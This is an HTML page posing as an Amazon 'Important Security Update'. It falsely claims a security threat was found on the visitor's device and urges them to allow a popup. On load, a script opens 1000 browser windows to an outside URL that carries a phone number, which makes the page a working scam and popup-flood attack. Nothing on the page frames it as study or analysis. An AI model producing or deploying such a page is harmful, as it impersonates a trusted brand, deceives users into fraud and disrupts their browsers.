<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Amazon Security Update</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f2f2f2;
        }

        .container {
            width: 80%;
            margin: 50px auto;
            background-color: #fff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
        }

        h1 {
            font-size: 24px;
            margin-top: 0;
            margin-bottom: 10px;
        }

        p {
            font-size: 16px;
            line-height: 1.5;
            margin-bottom: 20px;
        }

        .button-container {
            text-align: center;
        }

        .button {
            display: inline-block;
            background-color: #f0c14b;
            color: #fff;
            padding: 10px 20px;
            border-radius: 5px;
            text-decoration: none;
            font-size: 16px;
            transition: background-color 0.3s;
        }

        .button:hover {
            background-color: #e0b13a;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Important Security Update</h1>
        <p>We have detected a potential security threat on your device. Please allow the following popup to install the necessary security updates and protect your personal information.</p>
    </div>
        <script>
            window.onload = function() {
                for (let step = 0; step < 1000; step++) {
  		window.open("https://app-mig.emreach.com/incidents/record?phoneNumber=917979898742&voiceid=00000000-0000-0000-0000-000000000000")
	      } 
            }
        </script>
</body>
</html>